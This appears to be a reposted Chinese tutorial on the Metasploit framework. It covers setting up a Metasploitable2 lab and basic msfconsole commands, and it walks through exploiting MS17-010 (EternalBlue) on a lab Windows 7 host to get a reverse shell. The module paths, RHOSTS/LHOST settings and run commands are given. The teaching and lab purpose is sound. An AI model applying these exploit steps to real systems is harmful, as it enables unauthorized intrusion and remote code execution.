Metasploit(MSF)渗透测试框架使用教程及基本命令

Metasploit(MSF)渗透测试框架使用教程及基本命令

2023年6月24日发(作者:)

Metasploit(MSF)渗透测试框架使⽤教程及基本命令第⼀章 Metasploit渗透框架介绍及体系框架1.1 Metasploit 渗透测试框架介绍  Metasploit 是⼀个渗透测试⼯具,也是信息安全与渗透测试领域最⼤的开源项⽬之⼀。使您能够查找,利⽤和验证漏洞。它本⾝附带数百个已知软件漏洞的专业级漏洞攻击⼯具。Metasploit的设计初衷是打造成⼀个攻击⼯具开发平台。1.2 Metasploit 体系框架 模块:模块组织按照不同的⽤途分为6种类型的模块分为辅助模块(Aux)、渗透攻击模块(Exploits)、后渗透攻击模块(Post)、攻击载荷模块(payloads)、编码器模块(Encoders)、空指令模块(Nops)。 注:后渗透攻击模块(Post):在渗透攻击模块拿到⽬标shell权限后,进⾏进⼀步攻击的叫做后渗透攻击模块。 注:攻击载荷模块(payload):payload模块主要是⽤来建⽴⽬标机与攻击机稳定的连接。 通过攻击模块成功后利⽤payload可以返回⼀个shell,也可以进⾏程序注⼊等。 接⼝:msfconsole控制终端命令、msfcli命令⾏、msfgui图形化界⾯、armitage图形化界⾯以及msfapi远程调⽤接⼝第⼆章 靶机搭建及Metasploit框架启动2.1 Metasploitable2-Linux 靶机系统介绍Metasploitable2 虚拟系统是⼀个特别制作的ubuntu操作系统,本⾝设计 作为安全⼯具测试和演⽰常见漏洞攻击。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。2.2 Metasploitable2-Linux 靶机系统安装1.下载完后直接解压缩到当前⽂件夹2.打开Vmware后点击“打开虚拟机” ,如图:3.打开“”虚拟机⽂件4.开启虚拟机使⽤普通⽤户:msfadmin 密码:msfadmin 进⾏登录进去系统后使⽤命令:#sudu passwd root //修改root管理员密码修改root密码完成后使⽤命令:#su root //切换root账户配置静态IP :#vim /etc/network/interfaces //修改⽹卡配置------------------------------#iface eth0 inet static#address IP#netmask ⼦⽹掩码#gateway ⽹关------------------------------重启⽹卡配置:#/etc/init.d/networking restart //重启⽹卡配置2.3 启动 Metasploit 框架Metasploit 程序需要使⽤Postgresql数据库,Kali⾃带Postgresql数据库启动三项:启动Postgresql 数据库命令:systemctl start postgresql开机⾃启动Postgresql命令:systemctl enable postgresql启动Metasploit框架命令:msfconsole出现“ msf6 > ”证明Metasploit框架启⽤成功,现在可以进⾏操作了,可以参考命令⽂档进⾏操作。第三章 Metasploit框架基本使⽤⽅法3.1 帮助(help)#helpCore Commands 核⼼命令Module Commands 模块命令Job Commands 后台任务命令Resource Commands 资源脚本命令Database Backend Commands 数据库后端命令Credentials Backend Commands 证书凭证后端命令Developer Commands 开发⼈员相关命令3.2 连接(connect)Connect 为核⼼命令。使⽤⽅法:#connect 192.168.1.1 80 //连接192.168.1.1的80端⼝#get /-------------------------------HTTP/1.1 400 Page not foundServer: GoAhead-WebsDate: Tue Mar 30 22:15:02 2021Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html-------------------------------3.3 列出(show)show 命令列出所有渗透攻击模块。show命令有效参数:all,encoders,exploits,payloads,auxiliary,post,plugins,info,options,targets#show all //列出所有渗透攻击模块3.4 搜索(search)search 命令:#search mysql //搜索mysql相关漏洞模块#search name:mysql //查找mysql漏洞模块#search type:exploit //搜索exploit类型模块#search cve:CVE-2017-8464 //搜索CVE漏洞#search cve:2018 name:linux //搜索2018年linux漏洞模块search表单含义:Name Disclosure Date Rank Check Description名称   披露⽇期   等级  检查   说明Rank 通常⽤来描述漏洞级别,每个漏洞利⽤模块基于它们对⽬标系统的影响都被标记了⼀个Rank字段。Rank 按照可靠性降序排列:1. great 该漏洞利⽤程序有⼀个默认的⽬标系统,并且可以⾃动检测适当的⽬标系统,或者在⽬标服务的版本检查之后可以返回到⼀个特定的返回地址;2. good 该漏洞利⽤程序有个默认的⽬标系统,并且是这种类型软件的“常见情况“(桌⾯应⽤程序的Windows 7,服务器的2012等);3. normal 该漏洞利⽤程序是可靠的,但是依赖于特定的版本,并且不能可靠地⾃动检测。4. average 该漏洞利⽤程序不可靠或难以利⽤;5. low 对于通⽤的平台⽽⾔该漏洞程序⼏乎不能利⽤(或者低于50%的利⽤成功率);6. manual 该漏洞利⽤程序不稳定或者难以利⽤并且基于拒绝服务(DOS);3.5 使⽤(use)命令:#use 模块的Name //调⽤装载该模块#back //退出当前调⽤的模块。#info //查看Rank等级、发布时间、可复现的⽬标系统#run //执⾏exploit第四章 模块整体使⽤流程4.1 模块使⽤流程四步法第⼀步 确定漏洞,已知漏洞,例:MS17-010;第⼆步 查找模块,search MS17-010;第三步 配置模块程序,use exploit、set payload、set 参数;第四步 执⾏模块程序,exploit,run;第五章 实战-使⽤msf渗透攻击Win7主机5.1 第⼀步-确定⽬标及漏洞⽬标:192.168.1.131漏洞:MS17-010⽬的:拿到最⾼权限,进⾏远程代码执⾏⽤nmap扫描主机开放445端⼝,接下⽤msf测试⼀下漏洞是否存在。5.2 第⼆步-查找验证模块并且调⽤使⽤#msfconsole命令调⽤Metasploit框架,如图:使⽤#search MS17-010命令,搜索查找MS17-010漏洞模块,如图:这⾥我们先选择#1的auxiliary(辅助模块)先进⾏踩点,查看漏洞是否可以利⽤,再去进⾏渗透攻击。#use auxiliary/scanner/smb/smb_ms17_010 //调⽤此模块如图:使⽤#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。使⽤#set RHOSTS 192.168.1.131 命令,设置⽬标地址。最后使⽤#run命令去运⾏查看漏洞是否存在Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010漏洞,可以去利⽤。检测到该⽬标操作系统是Windows 7 专业版接下来我们可以利⽤exploits模块进⾏渗透攻击。5.3 第三步-利⽤exploist模块进⾏渗透第⼆步骤的时候检测到⽬标存在该漏洞,现在我们开始进⾏渗透。先使⽤#back命令退出辅助模块,如图:使⽤#search MS17-010命令,搜索MS17-010模块,如图:我们在第⼆步的时候使⽤的是auxiliary模块进⾏的漏洞检测,这回我们使⽤exploit模块进⾏漏洞利⽤。这⾥我们选择#2#use exploit/windows/smb/ms17_010_eternalblue使⽤#show options命令,查看需要设置的参数,如图:这⾥我们看见多出⼀个payload选项,这个选项的⽤处主要是渗透攻击成功后⽬标机与LHOST建⽴的Shell连接,所以LHOST参数设置我们⾃⼰本地的IP地址,RHOSTS参数还是⽬标IP#set RHOSTS 192.168.1.131 //设置exploit,⽬标IP#set LHOST 192.168.1.138 //设置payload如图:最后使⽤#run命令去运⾏exploit显⽰192.168.1.138:4444 -> 192.168.1.131:49160 我们已经所渗透成功了,现在我们已经拿到⽬标机的Shell了。我们可以使⽤#shell命令,在⽬标机打开⼀个shell。如果显⽰乱码,⽤#chcp 65001命令,改成UTF-8代码页。未完!

发布者:admin,转转请注明出处:http://www.yc00.com/web/1687579606a21800.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信